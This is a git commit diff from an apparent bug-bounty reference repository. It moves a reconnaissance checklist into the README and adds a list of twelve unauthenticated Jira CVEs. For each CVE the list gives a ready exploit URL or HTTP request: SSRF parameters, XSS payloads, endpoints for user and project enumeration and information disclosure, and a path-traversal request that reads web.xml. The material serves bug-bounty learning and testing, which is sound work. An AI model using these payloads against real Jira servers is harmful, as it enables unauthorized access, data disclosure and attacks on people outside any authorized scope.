Grouping, Added Jira CVE, Updated Readme

2025-02-20 13:46:04 +00:00 · 2021-02-04 07:08:28 +07:00 · 2021-02-04 07:08:28 +07:00 · e5fe70193a
commit e5fe70193a
parent 191cab1378
9 changed files with 158 additions and 68 deletions
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
--- a/Misc/Recon.MD
+++ b/Misc/Recon.MD
@ -1,66 +0,0 @@
-# Bug-Bounty-Recon
-
-## Small Scope
-### Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs. like: app.harshbothra.tech
- [x] Directory Enumeration
- [x] Technology Fingerprinting
- [x] Port Scanning
- [x] Parameter Fuzzing
- [x] Wayback History
- [x] Known Vulnerabilities
- [x] Hardcoded Information in JavaScript
- [x] Domain Specific GitHub & Google Dorking
- [x] Broken Link Hijacking
- [x] Data Breach Analysis
- [x] Misconfigured Cloud Storage
-## Medium Scope
-### Usually the scope is wild card scope where all the subdomains are part of scope. like: Scope: *.harshbothra.tech
- [x] Subdomain Enumeration
- [x] Subdomain Takeover
- [x] Probing & Technology Fingerprinting
- [x] Port Scanning
- [x] Known Vulnerabilities
- [x] Template Based Scanning (Nuclei/Jeales)
- [x] Misconfigured Cloud Storage
- [x] Broken Link Hijacking
- [x] Directory Enumeration
- [x] Hardcoded Information in JavaScript
- [x] GitHub Reconnaissance
- [x] Google Dorking
- [x] Data Breach Analysis
- [x] Parameter Fuzzing
- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
- [x] IP Range Enumeration (If in Scope)
- [x] Wayback History
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
- [x] Heartbleed Scanning
- [x] General Security Misconfiguration Scanning
-## Large Scope
-### Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) 
- [x] Subsidiary & Acquisition Enumeration (Depth – Max)
- [x] Reverse Lookup
- [x] ASN & IP Space Enumeration and Service Identification
- [x] Subdomain Enumeration
- [x] Subdomain Takeover
- [x] Probing & Technology Fingerprinting
- [x] Port Scanning
- [x] Known Vulnerabilities
- [x] Template Based Scanning (Nuclei/Jeales)
- [x] Misconfigured Cloud Storage
- [x] Broken Link Hijacking
- [x] Directory Enumeration
- [x] Hardcoded Information in JavaScript
- [x] GitHub Reconnaissance
- [x] Google Dorking
- [x] Data Breach Analysis
- [x] Parameter Fuzzing
- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
- [x] IP Range Enumeration (If in Scope)
- [x] Wayback History
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
- [x] Heartbleed Scanning
- [x] General Security Misconfiguration Scanning
- [x] And any possible Recon Vector (Network/Web) can be applied.
-
-Source: [Link](https://www.xmind.net/m/hKKexj/)
--- a/Misc/Unauthenticated
+++ b/Misc/Unauthenticated
@ -0,0 +1,62 @@
+# Unauthenticated Jira CVEs
+1. CVE-2017-9506 (SSRF)
+```
+https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
+```
+2. CVE-2018-20824 (XSS)
+```
+https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
+```
+3. CVE-2019-8451 (SSRF)
+```
+https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
+```
+4. CVE-2019-8449 (User Information Disclosure)
+```
+https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
+```
+5. CVE-2019-8442 (Sensitive Information Disclosure)
+```
+https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
+```
+6. CVE-2019-3403 (User Enumeration)
+```
+https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
+```
+7. CVE-2020-14181 (User Enumeration)
+```
+https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
+```
+8. CVE-2020-14178 (Project Key Enumeration)
+```
+https://<JIRA_URL>/browse.<PROJECT_KEY>
+```
+9. CVE-2020-14179 (Information Disclosure)
+```
+https://<JIRA_URL>/secure/QueryComponent!Default.jspa
+```
+10. CVE-2019-11581 (Template Injection)
+```
+<JIRA_URL>/secure/ContactAdministrators!default.jspa
+
+* Try the SSTI Payloads
+```
+
+11.   CVE-2019-3396 (Path Traversal)
+```
+POST /rest/tinymce/1/macro/preview HTTP/1.1
+Host: {{Hostname}}
+Accept: */*
+Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Referer: {{Hostname}}
+Content-Length: 168
+Connection: close
+
+{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+
+*Try above request with the Jira target
+```
+12.   CVE-2019-3402 (XSS)
+```
+https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
+```
--- a/README.md
+++ b/README.md
@ -1,2 +1,96 @@
-# AllAboutBugBounty
-All about bug websites (bypasses, payloads, and etc)
+# All about bug bounty
+
+## List
+- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md)
+- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
+- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
+- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
+- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
+- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
+- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md)
+
+## List Bypass
+- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
+- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
+- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
+- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
+- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
+- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
+
+## List CMS
+- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md)
+
+## List Framework
+- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
+- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
+
+## Miscellaneous
+- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
+
+## Reconnaissance
+* ### __Small Scope__
+Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
+- [x] Directory Enumeration
+- [x] Technology Fingerprinting
+- [x] Port Scanning
+- [x] Parameter Fuzzing
+- [x] Wayback History
+- [x] Known Vulnerabilities
+- [x] Hardcoded Information in JavaScript
+- [x] Domain Specific GitHub & Google Dorking
+- [x] Broken Link Hijacking
+- [x] Data Breach Analysis
+- [x] Misconfigured Cloud Storage
+* ### __Medium Scope__
+Usually the scope is wild card scope where all the subdomains are part of scope
+- [x] Subdomain Enumeration
+- [x] Subdomain Takeover
+- [x] Probing & Technology Fingerprinting
+- [x] Port Scanning
+- [x] Known Vulnerabilities
+- [x] Template Based Scanning (Nuclei/Jeales)
+- [x] Misconfigured Cloud Storage
+- [x] Broken Link Hijacking
+- [x] Directory Enumeration
+- [x] Hardcoded Information in JavaScript
+- [x] GitHub Reconnaissance
+- [x] Google Dorking
+- [x] Data Breach Analysis
+- [x] Parameter Fuzzing
+- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
+- [x] IP Range Enumeration (If in Scope)
+- [x] Wayback History
+- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
+- [x] Heartbleed Scanning
+- [x] General Security Misconfiguration Scanning
+* ### __Large Scope__
+Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
+- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) 
+- [x] Subsidiary & Acquisition Enumeration (Depth – Max)
+- [x] Reverse Lookup
+- [x] ASN & IP Space Enumeration and Service Identification
+- [x] Subdomain Enumeration
+- [x] Subdomain Takeover
+- [x] Probing & Technology Fingerprinting
+- [x] Port Scanning
+- [x] Known Vulnerabilities
+- [x] Template Based Scanning (Nuclei/Jeales)
+- [x] Misconfigured Cloud Storage
+- [x] Broken Link Hijacking
+- [x] Directory Enumeration
+- [x] Hardcoded Information in JavaScript
+- [x] GitHub Reconnaissance
+- [x] Google Dorking
+- [x] Data Breach Analysis
+- [x] Parameter Fuzzing
+- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
+- [x] IP Range Enumeration (If in Scope)
+- [x] Wayback History
+- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
+- [x] Heartbleed Scanning
+- [x] General Security Misconfiguration Scanning
+- [x] And any possible Recon Vector (Network/Web) can be applied.
+
+Source: [Link](https://www.xmind.net/m/hKKexj/)
+
+## Coming Soon!